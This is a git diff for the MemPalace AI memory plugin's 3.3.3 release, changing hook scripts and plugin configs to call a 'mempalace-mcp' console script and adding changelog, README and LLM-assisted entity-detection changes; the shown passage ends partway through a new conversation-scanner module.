diff --git a/.claude-plugin/.mcp.json b/.claude-plugin/.mcp.json
index b1e81ed81..dd7d55d74 100644
--- a/.claude-plugin/.mcp.json
+++ b/.claude-plugin/.mcp.json
@@ -1,9 +1,5 @@
 {
   "mempalace": {
-    "command": "python3",
-    "args": [
-      "-m",
-      "mempalace.mcp_server"
-    ]
+    "command": "mempalace-mcp"
   }
 }
diff --git a/.claude-plugin/hooks/mempal-precompact-hook.sh b/.claude-plugin/hooks/mempal-precompact-hook.sh
index 0ac46ddc4..19bb6b0d4 100644
--- a/.claude-plugin/hooks/mempal-precompact-hook.sh
+++ b/.claude-plugin/hooks/mempal-precompact-hook.sh
@@ -1,5 +1,24 @@
 #!/bin/bash
 # MemPalace PreCompact Hook — thin wrapper calling Python CLI
 # All logic lives in mempalace.hooks_cli for cross-harness extensibility
-INPUT=$(cat)
-echo "$INPUT" | python3 -m mempalace hook run --hook precompact --harness claude-code
+run_mempalace_hook() {
+  if command -v mempalace >/dev/null 2>&1; then
+    mempalace hook run "$@"
+    return $?
+  fi
+
+  if command -v python3 >/dev/null 2>&1 && python3 -c "import mempalace" >/dev/null 2>&1; then
+    python3 -m mempalace hook run "$@"
+    return $?
+  fi
+
+  if command -v python >/dev/null 2>&1 && python -c "import mempalace" >/dev/null 2>&1; then
+    python -m mempalace hook run "$@"
+    return $?
+  fi
+
+  echo "MemPalace hook error: could not find a runnable mempalace command or module" >&2
+  return 1
+}
+
+run_mempalace_hook --hook precompact --harness claude-code
diff --git a/.claude-plugin/hooks/mempal-stop-hook.sh b/.claude-plugin/hooks/mempal-stop-hook.sh
index cba328496..5c860b47c 100644
--- a/.claude-plugin/hooks/mempal-stop-hook.sh
+++ b/.claude-plugin/hooks/mempal-stop-hook.sh
@@ -1,5 +1,24 @@
 #!/bin/bash
 # MemPalace Stop Hook — thin wrapper calling Python CLI
 # All logic lives in mempalace.hooks_cli for cross-harness extensibility
-INPUT=$(cat)
-echo "$INPUT" | python3 -m mempalace hook run --hook stop --harness claude-code
+run_mempalace_hook() {
+  if command -v mempalace >/dev/null 2>&1; then
+    mempalace hook run "$@"
+    return $?
+  fi
+
+  if command -v python3 >/dev/null 2>&1 && python3 -c "import mempalace" >/dev/null 2>&1; then
+    python3 -m mempalace hook run "$@"
+    return $?
+  fi
+
+  if command -v python >/dev/null 2>&1 && python -c "import mempalace" >/dev/null 2>&1; then
+    python -m mempalace hook run "$@"
+    return $?
+  fi
+
+  echo "MemPalace hook error: could not find a runnable mempalace command or module" >&2
+  return 1
+}
+
+run_mempalace_hook --hook stop --harness claude-code
diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json
index be85be35c..aa15e5b26 100644
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -9,7 +9,7 @@
       "name": "mempalace",
       "source": "./.claude-plugin",
       "description": "AI memory system — mine projects and conversations into a searchable palace. 19 MCP tools, auto-save hooks, guided setup.",
-      "version": "3.3.2",
+      "version": "3.3.3",
       "author": {
         "name": "milla-jovovich"
       }
diff --git a/.claude-plugin/plugin.json b/.claude-plugin/plugin.json
index a1a337721..a1b69a61d 100644
--- a/.claude-plugin/plugin.json
+++ b/.claude-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "mempalace",
-  "version": "3.3.2",
+  "version": "3.3.3",
   "description": "Give your AI a memory — mine projects and conversations into a searchable palace. 19 MCP tools, auto-save hooks, and guided setup.",
   "author": {
     "name": "milla-jovovich"
@@ -9,11 +9,7 @@
   "commands": [],
   "mcpServers": {
     "mempalace": {
-      "command": "python3",
-      "args": [
-        "-m",
-        "mempalace.mcp_server"
-      ]
+      "command": "mempalace-mcp"
     }
   },
   "keywords": [
diff --git a/.codex-plugin/hooks/mempal-hook.sh b/.codex-plugin/hooks/mempal-hook.sh
index 1cc005014..6d1113a41 100644
--- a/.codex-plugin/hooks/mempal-hook.sh
+++ b/.codex-plugin/hooks/mempal-hook.sh
@@ -3,7 +3,7 @@ set -euo pipefail
 HOOK_NAME="${1:?Usage: mempal-hook.sh <hook-name>}"
 INPUT_FILE=$(mktemp) || { echo "Failed to create temp file" >&2; exit 1; }
 cat > "$INPUT_FILE"
-cat "$INPUT_FILE" | python3 -m mempalace hook run --hook "$HOOK_NAME" --harness codex
+cat "$INPUT_FILE" | mempalace hook run --hook "$HOOK_NAME" --harness codex
 EXIT_CODE=$?
 rm -f "$INPUT_FILE" 2>/dev/null
 exit $EXIT_CODE
diff --git a/.codex-plugin/plugin.json b/.codex-plugin/plugin.json
index 41d55fb21..16b66bb3a 100644
--- a/.codex-plugin/plugin.json
+++ b/.codex-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "mempalace",
-  "version": "3.3.2",
+  "version": "3.3.3",
   "description": "Give your AI a memory — mine projects and conversations into a searchable palace. 19 MCP tools, auto-save hooks, and guided setup.",
   "author": {
     "name": "milla-jovovich"
@@ -21,11 +21,7 @@
   "hooks": "./hooks.json",
   "mcpServers": {
     "mempalace": {
-      "command": "python3",
-      "args": [
-        "-m",
-        "mempalace.mcp_server"
-      ]
+      "command": "mempalace-mcp"
     }
   },
   "interface": {
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 483b8aa4d..2051ab360 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,44 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 
 ---
 
+## [3.3.3] — 2026-04-23
+
+### Bug Fixes
+
+- **Install regression** — `mempalace-mcp` console script is now declared in `pyproject.toml` alongside `.claude-plugin/plugin.json`'s reference to it. In v3.3.2 the two drifted apart (plugin.json shipped the new `"command": "mempalace-mcp"` form before the matching entry point landed), so every fresh `pip install mempalace==3.3.2` produced a Claude Code plugin config pointing at a binary that wasn't installed. (#1093, #340)
+- Restore silent-save visibility after the Claude Code 2.1.114 client regression — production transcript saves were failing silently until this PR. (#1021)
+- Paginate `status`-path metadata fetches so large palaces don't trip SQLite variable limits. (#851)
+- Resolve the Claude plugin hook runner across platform / plugin-dir variations; previously broke on Windows and some macOS layouts. (#942)
+- Real `python3` resolution for `.sh` hooks with a `MEMPAL_PYTHON` override path. (#833)
+- Add optional `wing` parameter to `tool_diary_write` / `tool_diary_read` and derive per-project wing from the Claude Code transcript path when writing from the stop hook — diary entries from different projects no longer collapse into a shared default wing. (#659)
+- Treat empty string as "no filter" in `mempalace_search` `wing`/`room`; LLM agents that default to filling every optional parameter with `""` no longer get bounced with `must be a non-empty string`. (#1097, #1084)
+- Broaden `_wing_from_transcript_path` to handle Claude Code project folders without a `-Projects-` segment (e.g. `~/dev/<parent>/<project>`, `~/code/<project>`). The project name is now derived from the final dash-separated token of the encoded folder, so Linux users with code outside `~/Projects/` get per-project diary scoping instead of falling through to `wing_sessions`. (#1145, follow-up to #659)
+- `mempalace_diary_read(wing="")` now returns diary entries from every wing this agent has written to, matching the #1097 "empty-string as no filter" pattern. Previously defaulted to `wing_<agent>`, siloing entries that hooks wrote to project-derived wings. (#1145)
+- `mempalace mine` now skips the generated `entities.json` file so its contents aren't re-ingested as project content. (#1175)
+
+### Improvements
+
+- **Deterministic hook saves.** Save hook now uses a silent Python API path, so successive hook invocations produce reproducible results and zero data loss on the hot path. (#673)
+- **Graph cache with write-invalidation** inside `build_graph()` — warm-path calls no longer rebuild the palace-graph per request. (#661)
+- **`mempalace init` entity detection overhaul.** Canonical project names now come from package manifests (`package.json`, `pyproject.toml`, `Cargo.toml`, `go.mod`) and real people come from git commit authors, rather than being inferred from prose. Includes union-find dedup across name/email aliases, bot filtering that keeps `@users.noreply.github.com` humans, and automatic "mine" flagging by contribution share. (#1148)
+- **Regex detector accuracy.** CamelCase extraction so `MemPalace`, `ChromaDB`, `OpenAI` aren't fragmented; tighter versioned/hyphenated pattern kills `context-manager` / `multi-word` false positives; dialogue `^NAME:\s` requires ≥2 hits so `Created: <date>` metadata stops classifying field names as people; expanded stopwords for common English participles and descriptors; high-pronoun signal classifies as person rather than dumping to uncertain. (#1148)
+- **Init → miner wire-up.** Confirmed entities merge into `~/.mempalace/known_entities.json` on init, which the miner reads to tag drawer metadata for entity-filtered search. Previously init's output was not consumed by the miner; the per-project `entities.json` is kept as an audit trail. (#1157)
+- **Case-insensitive project dedup** across manifest, git, and convo sources so casing variants of the same project name collapse into one review entry. (#1175)
+
+### Added
+
+- i18n: Belarusian translation. (#1051)
+- i18n: entity detection for German, Spanish, and French locales. (#1001)
+- i18n: Traditional + Simplified Chinese entity detection. (#945)
+- **`mempalace init --llm`**: optional LLM-assisted entity classification. Defaults to local Ollama (zero-API); also supports any OpenAI-compatible endpoint (LM Studio, llama.cpp server, vLLM, OpenRouter, etc.) and the Anthropic Messages API. Runs interactively with a progress indicator; Ctrl-C cancels cleanly and returns partial results. Useful for prose-heavy folders where the regex detector struggles (diaries, transcripts, research notes). Opt-in only — default init path remains zero-API. (#1150)
+- **Claude Code conversation scanner.** `~/.claude/projects/<slug>/` directories now contribute project entities using each session's authoritative `cwd` metadata, avoiding slug-decoding ambiguity. (#1150)
+
+### Known — deferred to v3.3.4
+
+- HNSW parallel-insert SIGSEGV when `hnsw:num_threads` is unset on collection creation (#974) — fix in-flight as #976, awaiting rebase against develop.
+
+---
+
 ## [3.3.2] — 2026-04-19
 
 ### Bug Fixes
diff --git a/README.md b/README.md
index 97cb4b006..acbeb143f 100644
--- a/README.md
+++ b/README.md
@@ -177,7 +177,7 @@ PRs welcome. See [CONTRIBUTING.md](CONTRIBUTING.md).
 MIT — see [LICENSE](LICENSE).
 
 <!-- Link Definitions -->
-[version-shield]: https://img.shields.io/badge/version-3.3.2-4dc9f6?style=flat-square&labelColor=0a0e14
+[version-shield]: https://img.shields.io/badge/version-3.3.3-4dc9f6?style=flat-square&labelColor=0a0e14
 [release-link]: https://github.com/MemPalace/mempalace/releases
 [python-shield]: https://img.shields.io/badge/python-3.9+-7dd8f8?style=flat-square&labelColor=0a0e14&logo=python&logoColor=7dd8f8
 [python-link]: https://www.python.org/
diff --git a/examples/HOOKS_TUTORIAL.md b/examples/HOOKS_TUTORIAL.md
index 1b09467fd..3a34b81c2 100644
--- a/examples/HOOKS_TUTORIAL.md
+++ b/examples/HOOKS_TUTORIAL.md
@@ -25,4 +25,27 @@ Add this to your configuration file to enable automatic background saving:
       }
     ]
   }
-}
\ No newline at end of file
+}
+```
+
+### 3. What changed (v3.1.0+)
+
+Both hooks now have **two-layer capture**:
+
+1. **Auto-mine**: Before blocking the AI, the hook runs the normalizer on the JSONL transcript and upserts chunks directly into the palace. This captures raw tool output (Bash results, search findings, build errors) that the AI would otherwise summarize away.
+
+2. **Updated reason messages**: The block reason now explicitly tells the AI to save tool output verbatim — not just topics and decisions.
+
+### 4. Backfill past conversations (one-time)
+
+The hooks capture conversations going forward, but you probably have months of past sessions. Run this once to mine them all:
+
+```bash
+mempalace mine ~/.claude/projects/ --mode convos
+```
+
+### 5. Configuration
+
+- **`SAVE_INTERVAL=15`** — How many human messages between saves
+- **`MEMPALACE_PYTHON`** — Python interpreter with mempalace + chromadb. Auto-detects: env var → repo venv → system python3
+- **`MEMPAL_DIR`** — Optional directory for auto-ingest via `mempalace mine`
\ No newline at end of file
diff --git a/examples/mcp_setup.md b/examples/mcp_setup.md
index 9bc26dd61..2b7e1c3bf 100644
--- a/examples/mcp_setup.md
+++ b/examples/mcp_setup.md
@@ -5,13 +5,13 @@
 Run the MCP server:
 
 ```bash
-python -m mempalace.mcp_server
+mempalace-mcp
 ```
 
 Or add it to Claude Code:
 
 ```bash
-claude mcp add mempalace -- python -m mempalace.mcp_server
+claude mcp add mempalace -- mempalace-mcp
 ```
 
 ## Available Tools
diff --git a/hooks/README.md b/hooks/README.md
index 977b109ed..7794527dd 100644
--- a/hooks/README.md
+++ b/hooks/README.md
@@ -6,10 +6,10 @@ These hook scripts make MemPalace save automatically. No manual "save" commands
 
 | Hook | When It Fires | What Happens |
 |------|--------------|-------------|
-| **Save Hook** | Every 15 human messages | Blocks the AI, tells it to save key topics/decisions/quotes to the palace |
-| **PreCompact Hook** | Right before context compaction | Emergency save — forces the AI to save EVERYTHING before losing context |
+| **Save Hook** | Every 15 human messages | Auto-mines transcript (tool output included), then blocks the AI to save topics/decisions/quotes |
+| **PreCompact Hook** | Right before context compaction | Auto-mines transcript, then emergency save — forces the AI to save EVERYTHING before losing context |
 
-The AI does the actual filing — it knows the conversation context, so it classifies memories into the right wings/halls/closets. The hooks just tell it WHEN to save.
+**Two-layer capture:** Hooks auto-mine the JSONL transcript directly into the palace (capturing raw tool output — Bash results, search findings, build errors). They also block the AI with a reason message telling it to save verbatim tool output and key context. Belt and suspenders — tool output gets stored even if the AI summarizes instead of quoting.
 
 ## Install — Claude Code
 
@@ -68,6 +68,7 @@ Edit `mempal_save_hook.sh` to change:
 - **`SAVE_INTERVAL=15`** — How many human messages between saves. Lower = more frequent saves, higher = less interruption.
 - **`STATE_DIR`** — Where hook state is stored (defaults to `~/.mempalace/hook_state/`)
 - **`MEMPAL_DIR`** — Optional. Set to a conversations directory to auto-run `mempalace mine <dir>` on each save trigger. Leave blank (default) to let the AI handle saving via the block reason message.
+- **`MEMPALACE_PYTHON`** — Optional env var. Python interpreter with mempalace + chromadb installed. Auto-detects: `MEMPALACE_PYTHON` env var → repo `venv/bin/python3` → system `python3`. Set this if your venv is in a non-standard location.
 
 ### mempalace CLI
 
@@ -91,15 +92,19 @@ User sends message → AI responds → Claude Code fires Stop hook
                                             ↓
                               ┌─── < 15 since last save ──→ echo "{}" (let AI stop)
                               │
-                              └─── ≥ 15 since last save ──→ {"decision": "block", "reason": "save..."}
-                                                                    ↓
-                                                            AI saves to palace
-                                                                    ↓
-                                                            AI tries to stop again
-                                                                    ↓
-                                                            stop_hook_active = true
-                                                                    ↓
-                                                            Hook sees flag → echo "{}" (let it through)
+                              └─── ≥ 15 since last save
+                                            ↓
+                                    Auto-mine transcript → palace (tool output captured)
+                                            ↓
+                                    {"decision": "block", "reason": "save tool output verbatim..."}
+                                            ↓
+                                    AI saves to palace (topics, decisions, quotes)
+                                            ↓
+                                    AI tries to stop again
+                                            ↓
+                                    stop_hook_active = true
+                                            ↓
+                                    Hook sees flag → echo "{}" (let it through)
 ```
 
 The `stop_hook_active` flag prevents infinite loops: block once → AI saves → tries to stop → flag is true → we let it through.
@@ -109,14 +114,18 @@ The `stop_hook_active` flag prevents infinite loops: block once → AI saves →
 ```
 Context window getting full → Claude Code fires PreCompact
                                         ↓
-                                Hook ALWAYS blocks
+                                Find transcript (from input or session_id lookup)
+                                        ↓
+                                Auto-mine transcript → palace (tool output captured)
+                                        ↓
+                                {"decision": "block", "reason": "save tool output verbatim..."}
                                         ↓
                                 AI saves everything
                                         ↓
                                 Compaction proceeds
 ```
 
-No counting needed — compaction always warrants a save.
+No counting needed — compaction always warrants a save. The auto-mine captures raw tool output before the AI gets a chance to summarize it away.
 
 ## Debugging
 
@@ -137,6 +146,36 @@ Example output:
 
 **Hooks require session restart after install.** Claude Code loads hooks from `settings.json` at session start only. If you run `mempalace init` or manually edit hook config mid-session, the hooks won't fire until you restart Claude Code. This is a Claude Code limitation.
 
+**`MEMPAL_PYTHON` override for the hook's internal Python calls.** The save hook parses its JSON input and counts transcript messages with `python3`. When the harness is launched from a GUI on macOS — `open -a`, Spotlight, the dock — its `PATH` is the minimal `/usr/bin:/bin:/usr/sbin:/sbin` inherited from `launchd`, not your shell PATH. If `python3` isn't on that PATH, those internal calls fail and the hook can't count exchanges.
+
+Point the hook at any Python 3 interpreter to fix it:
+
+```bash
+export MEMPAL_PYTHON="/usr/bin/python3"                   # system Python is fine
+export MEMPAL_PYTHON="$HOME/.venvs/mempalace/bin/python"  # or your venv
+```
+
+Resolution priority: `$MEMPAL_PYTHON` (if set and executable) → `$(command -v python3)` → bare `python3`. The interpreter only needs `json` and `sys` from the standard library — `mempalace` itself does not need to be installed in it.
+
+Note: the `mempalace mine` auto-ingest runs via the `mempalace` CLI, so that command also needs to be on the hook's `PATH`. Installing with `pipx install mempalace` or `uv tool install mempalace` puts it on a stable global location; otherwise extend the hook environment's `PATH` to include your venv's `bin/`.
+
+## Backfill Past Conversations
+
+The hooks only capture conversations going forward. To mine **past** Claude Code sessions into your palace, run a one-time backfill:
+
+```bash
+mempalace mine ~/.claude/projects/ --mode convos
+```
+
+This scans all JSONL transcripts from previous sessions and files them into the `conversations` wing. On a typical developer machine with months of history, this can yield 50K–200K drawers.
+
+For Codex CLI sessions:
+```bash
+mempalace mine ~/.codex/sessions/ --mode convos
+```
+
+This only needs to be done once — after that, the hooks auto-mine each session as you go.
+
 ## Cost
 
 **Zero extra tokens.** The hooks notify the AI that saves happened in the background — the AI doesn't need to write anything in the chat. All filing is handled automatically. Previous versions asked the AI to write diary entries and drawer content in the chat window, which cost ~$1/session in retransmitted tokens.
diff --git a/hooks/mempal_precompact_hook.sh b/hooks/mempal_precompact_hook.sh
index 3a74ca54e..a14a0d0e9 100755
--- a/hooks/mempal_precompact_hook.sh
+++ b/hooks/mempal_precompact_hook.sh
@@ -54,10 +54,17 @@ mkdir -p "$STATE_DIR"
 # Leave empty to skip auto-ingest (AI handles saving via the block reason).
 MEMPAL_DIR=""
 
+# Resolve the Python interpreter. Same contract as mempal_save_hook.sh:
+# MEMPAL_PYTHON (explicit override) → $(command -v python3) → bare python3.
+MEMPAL_PYTHON_BIN="${MEMPAL_PYTHON:-}"
+if [ -z "$MEMPAL_PYTHON_BIN" ] || [ ! -x "$MEMPAL_PYTHON_BIN" ]; then
+    MEMPAL_PYTHON_BIN="$(command -v python3 2>/dev/null || echo python3)"
+fi
+
 # Read JSON input from stdin
 INPUT=$(cat)
 
-SESSION_ID=$(echo "$INPUT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('session_id','unknown'))" 2>/dev/null)
+SESSION_ID=$(echo "$INPUT" | "$MEMPAL_PYTHON_BIN" -c "import sys,json; print(json.load(sys.stdin).get('session_id','unknown'))" 2>/dev/null)
 
 echo "[$(date '+%H:%M:%S')] PRE-COMPACT triggered for session $SESSION_ID" >> "$STATE_DIR/hook.log"
 
@@ -65,7 +72,7 @@ echo "[$(date '+%H:%M:%S')] PRE-COMPACT triggered for session $SESSION_ID" >> "$
 if [ -n "$MEMPAL_DIR" ] && [ -d "$MEMPAL_DIR" ]; then
     SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
     REPO_DIR="$(dirname "$SCRIPT_DIR")"
-    python3 -m mempalace mine "$MEMPAL_DIR" >> "$STATE_DIR/hook.log" 2>&1
+    mempalace mine "$MEMPAL_DIR" >> "$STATE_DIR/hook.log" 2>&1
 fi
 
 # Silent: return empty JSON to not block. "decision": "allow" is invalid —
diff --git a/hooks/mempal_save_hook.sh b/hooks/mempal_save_hook.sh
index d8e7cc248..228b41bac 100755
--- a/hooks/mempal_save_hook.sh
+++ b/hooks/mempal_save_hook.sh
@@ -61,13 +61,30 @@ mkdir -p "$STATE_DIR"
 # Leave empty to skip auto-ingest (AI handles saving via the block reason).
 MEMPAL_DIR=""
 
+# Resolve the Python interpreter the hook should use.
+#
+# Why this is nontrivial: GUI-launched Claude Code on macOS (or any harness
+# that doesn't inherit the user's shell PATH) may find a `python3` on PATH
+# that lacks mempalace — e.g. /usr/bin/python3 while the user installed
+# mempalace into a venv or pyenv. Users in that situation can point the
+# hook at the right interpreter by exporting MEMPAL_PYTHON.
+#
+# Resolution order (first hit wins):
+#   1. $MEMPAL_PYTHON          — explicit user override (absolute path)
+#   2. $(command -v python3)   — first python3 on the hook's PATH
+#   3. bare "python3"          — last-resort fallback (hope the PATH has it)
+MEMPAL_PYTHON_BIN="${MEMPAL_PYTHON:-}"
+if [ -z "$MEMPAL_PYTHON_BIN" ] || [ ! -x "$MEMPAL_PYTHON_BIN" ]; then
+    MEMPAL_PYTHON_BIN="$(command -v python3 2>/dev/null || echo python3)"
+fi
+
 # Read JSON input from stdin
 INPUT=$(cat)
 
 # Parse all fields in a single Python call (3x faster than separate invocations)
 # SECURITY: All values are sanitized before being interpolated into shell assignments.
 # stop_hook_active is coerced to a strict True/False to prevent command injection via eval.
-eval $(echo "$INPUT" | python3 -c "
+eval $(echo "$INPUT" | "$MEMPAL_PYTHON_BIN" -c "
 import sys, json, re
 data = json.load(sys.stdin)
 sid = data.get('session_id', 'unknown')
@@ -95,7 +112,7 @@ fi
 # Count human messages in the JSONL transcript
 # SECURITY: Pass transcript path as sys.argv to avoid shell injection via crafted paths
 if [ -f "$TRANSCRIPT_PATH" ]; then
-    EXCHANGE_COUNT=$(python3 - "$TRANSCRIPT_PATH" <<'PYEOF'
+    EXCHANGE_COUNT=$("$MEMPAL_PYTHON_BIN" - "$TRANSCRIPT_PATH" <<'PYEOF'
 import json, sys
 count = 0
 with open(sys.argv[1]) as f:
@@ -144,7 +161,6 @@ if [ "$SINCE_LAST" -ge "$SAVE_INTERVAL" ] && [ "$EXCHANGE_COUNT" -gt 0 ]; then
     # 1. TRANSCRIPT_PATH (from Claude Code) — mine the directory it lives in
     # 2. MEMPAL_DIR (user-configured) — mine that directory
     # At least one should work. If neither is set, nothing mines.
-    PYTHON="$(command -v python3)"
     MINE_DIR=""
     if [ -n "$TRANSCRIPT_PATH" ] && [ -f "$TRANSCRIPT_PATH" ]; then
         MINE_DIR="$(dirname "$TRANSCRIPT_PATH")"
@@ -153,7 +169,7 @@ if [ "$SINCE_LAST" -ge "$SAVE_INTERVAL" ] && [ "$EXCHANGE_COUNT" -gt 0 ]; then
         MINE_DIR="$MEMPAL_DIR"
     fi
     if [ -n "$MINE_DIR" ]; then
-        "$PYTHON" -m mempalace mine "$MINE_DIR" >> "$STATE_DIR/hook.log" 2>&1 &
+        mempalace mine "$MINE_DIR" >> "$STATE_DIR/hook.log" 2>&1 &
     fi
 
     # MEMPAL_VERBOSE toggle:
diff --git a/mempalace/backends/chroma.py b/mempalace/backends/chroma.py
index 1a171c167..3a0d2c3f9 100644
--- a/mempalace/backends/chroma.py
+++ b/mempalace/backends/chroma.py
@@ -120,8 +120,7 @@ def quarantine_stale_hnsw(palace_path: str, stale_seconds: float = 3600.0) -> li
             os.rename(seg_dir, target)
             moved.append(target)
             logger.warning(
-                "Quarantined stale HNSW segment %s "
-                "(sqlite %.0fs newer than HNSW); renamed to %s",
+                "Quarantined stale HNSW segment %s (sqlite %.0fs newer than HNSW); renamed to %s",
                 seg_dir,
                 sqlite_mtime - hnsw_mtime,
                 target,
diff --git a/mempalace/cli.py b/mempalace/cli.py
index a4c8a886c..714c64c7b 100644
--- a/mempalace/cli.py
+++ b/mempalace/cli.py
@@ -71,7 +71,8 @@ def _ensure_mempalace_files_gitignored(project_dir) -> bool:
 def cmd_init(args):
     import json
     from pathlib import Path
-    from .entity_detector import scan_for_detection, detect_entities, confirm_entities
+    from .entity_detector import confirm_entities
+    from .project_scanner import discover_entities
     from .room_detector_local import detect_rooms_local
 
     cfg = MempalaceConfig()
@@ -85,25 +86,55 @@ def cmd_init(args):
         languages = cfg.entity_languages
     languages_tuple = tuple(languages)
 
-    # Pass 1: auto-detect people and projects from file content
+    # Optional phase-2 LLM provider (opt-in via --llm).
+    llm_provider = None
+    if getattr(args, "llm", False):
+        from .llm_client import LLMError, get_provider
+
+        try:
+            llm_provider = get_provider(
+                name=args.llm_provider,
+                model=args.llm_model,
+                endpoint=args.llm_endpoint,
+                api_key=args.llm_api_key,
+            )
+        except LLMError as e:
+            print(f"  ERROR: {e}", file=sys.stderr)
+            sys.exit(2)
+        ok, msg = llm_provider.check_available()
+        if not ok:
+            print(
+                f"  ERROR: LLM provider '{args.llm_provider}' unavailable: {msg}",
+                file=sys.stderr,
+            )
+            sys.exit(2)
+        print(f"  LLM refinement enabled: {args.llm_provider}/{args.llm_model}")
+
+    # Pass 1: discover entities — manifests + git authors first, prose detection
+    # as supplement for names mentioned only in docs/notes. Optional phase-2
+    # LLM refinement runs inside discover_entities when llm_provider is given.
     print(f"\n  Scanning for entities in: {args.dir}")
     if languages_tuple != ("en",):
         print(f"  Languages: {', '.join(languages_tuple)}")
-    files = scan_for_detection(args.dir)
-    if files:
-        print(f"  Reading {len(files)} files...")
-        detected = detect_entities(files, languages=languages_tuple)
-        total = len(detected["people"]) + len(detected["projects"]) + len(detected["uncertain"])
-        if total > 0:
-            confirmed = confirm_entities(detected, yes=getattr(args, "yes", False))
-            # Save confirmed entities to <project>/entities.json for the miner
-            if confirmed["people"] or confirmed["projects"]:
-                entities_path = Path(args.dir).expanduser().resolve() / "entities.json"
-                with open(entities_path, "w") as f:
-                    json.dump(confirmed, f, indent=2)
-                print(f"  Entities saved: {entities_path}")
-        else:
-            print("  No entities detected — proceeding with directory-based rooms.")
+    detected = discover_entities(args.dir, languages=languages_tuple, llm_provider=llm_provider)
+    total = len(detected["people"]) + len(detected["projects"]) + len(detected["uncertain"])
+    if total > 0:
+        confirmed = confirm_entities(detected, yes=getattr(args, "yes", False))
+        # Save confirmed entities to <project>/entities.json (per-project
+        # audit trail — user can inspect or hand-edit) AND merge into the
+        # global registry the miner reads at mine time.
+        if confirmed["people"] or confirmed["projects"]:
+            entities_path = Path(args.dir).expanduser().resolve() / "entities.json"
+            with open(entities_path, "w", encoding="utf-8") as f:
+                json.dump(confirmed, f, indent=2, ensure_ascii=False)
+            print(f"  Entities saved: {entities_path}")
+
+            from .miner import add_to_known_entities
+
+            registry_path = add_to_known_entities(confirmed)
+            print(f"  Registry updated: {registry_path}")
+    else:
+        print("  No entities detected — proceeding with directory-based rooms.")
 
     # Pass 2: detect rooms from folder structure
     detect_rooms_local(project_dir=args.dir, yes=getattr(args, "yes", False))
@@ -367,7 +398,7 @@ def cmd_instructions(args):
 
 def cmd_mcp(args):
     """Show how to wire MemPalace into MCP-capable hosts."""
-    base_server_cmd = "python -m mempalace.mcp_server"
+    base_server_cmd = "mempalace-mcp"
 
     if args.palace:
         resolved_palace = str(Path(args.palace).expanduser())
@@ -551,6 +582,43 @@ def main():
             "When given, the value is also persisted to config.json."
         ),
     )
+    p_init.add_argument(
+        "--llm",
+        action="store_true",
+        help=(
+            "Enable LLM-assisted entity refinement (opt-in, local-first). "
+            "Runs after manifest/git/regex detection, asking the configured "
+            "provider to reclassify ambiguous candidates. "
+            "Ctrl-C during refinement returns partial results."
+        ),
+    )
+    p_init.add_argument(
+        "--llm-provider",
+        default="ollama",
+        choices=["ollama", "openai-compat", "anthropic"],
+        help="LLM provider (default: ollama). Use --llm to enable.",
+    )
+    p_init.add_argument(
+        "--llm-model",
+        default="gemma4:e4b",
+        help="Model name for the chosen provider (default: gemma4:e4b for Ollama).",
+    )
+    p_init.add_argument(
+        "--llm-endpoint",
+        default=None,
+        help=(
+            "Provider endpoint URL. Default for Ollama: http://localhost:11434. "
+            "Required for openai-compat."
+        ),
+    )
+    p_init.add_argument(
+        "--llm-api-key",
+        default=None,
+        help=(
+            "API key for the provider. For anthropic, defaults to $ANTHROPIC_API_KEY; "
+            "for openai-compat, defaults to $OPENAI_API_KEY."
+        ),
+    )
 
     # mine
     p_mine = sub.add_parser("mine", help="Mine files into the palace")
diff --git a/mempalace/config.py b/mempalace/config.py
index a9bcc7ffb..616334e5c 100644
--- a/mempalace/config.py
+++ b/mempalace/config.py
@@ -168,7 +168,10 @@ def palace_path(self):
         """Path to the memory palace data directory."""
         env_val = os.environ.get("MEMPALACE_PALACE_PATH") or os.environ.get("MEMPAL_PALACE_PATH")
         if env_val:
-            return env_val
+            # Normalize: expand ~ and collapse .. to match the CLI --palace
+            # code path (mcp_server.py:62) and prevent surprise redirection
+            # when the env var contains unresolved components.
+            return os.path.abspath(os.path.expanduser(env_val))
         return self._file_config.get("palace_path", DEFAULT_PALACE_PATH)
 
     @property
diff --git a/mempalace/convo_scanner.py b/mempalace/convo_scanner.py
new file mode 100644
index 000000000..b592494d6
--- /dev/null
+++ b/mempalace/convo_scanner.py
@@ -0,0 +1,160 @@
+"""
+convo_scanner.py — Parse Claude Code conversation directories into ProjectInfo.
+
+Claude Code stores sessions under ``~/.claude/projects/<slug>/<id>.jsonl``,
+where the ``<slug>`` is the original CWD with ``/`` replaced by ``-``. That
+encoding is lossy: we can't tell whether ``foo-bar`` in a slug is the
+literal project name ``foo-bar`` or two path segments ``foo/bar``.
+
+Fortunately, every message record in the JSONL carries a ``cwd`` field with
+the true path. This scanner reads one record per session to recover the
+accurate project name, falling back to slug-decoding only if the JSONL
+is malformed or empty.
+
+Output is the same ``ProjectInfo`` shape used by ``project_scanner``, so the
+``discover_entities`` orchestrator can mix-and-match sources.
+
+Public:
+    is_claude_projects_root(path) -> bool
+    scan_claude_projects(path) -> list[ProjectInfo]
+"""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+from typing import Optional
+
+from mempalace.project_scanner import ProjectInfo
+
+
+MAX_HEADER_LINES = 20  # lines to read per session looking for `cwd`
+
+
+def is_claude_projects_root(path: Path) -> bool:
+    """Return True if path looks like `.claude/projects/`.
+
+    Heuristic: at least one child dir whose name starts with ``-`` and which
+    contains at least one ``.jsonl`` file.
+    """
+    if not path.is_dir():
+        return False
+    try:
+        children = list(path.iterdir())
+    except OSError:
+        return False
+    for child in children:
+        if not (child.is_dir() and child.name.startswith("-")):
+            continue
+        try:
+            if any(p.suffix == ".jsonl" for p in child.iterdir() if p.is_file()):
+                return True
+        except OSError:
+            continue
+    return False
+
+
+def _extract_cwd_from_session(session_file: Path) -> Optional[str]:
+    """Return the ``cwd`` from the first message record that carries one.
+
+    Returns None if the file can't be read, has no JSON, or no record has cwd.
+    """
+    try:
+        with open(session_file, encoding="utf-8", errors="replace") as f:
+            for i, line in enumerate(f):
+                if i >= MAX_HEADER_LINES:
+                    break
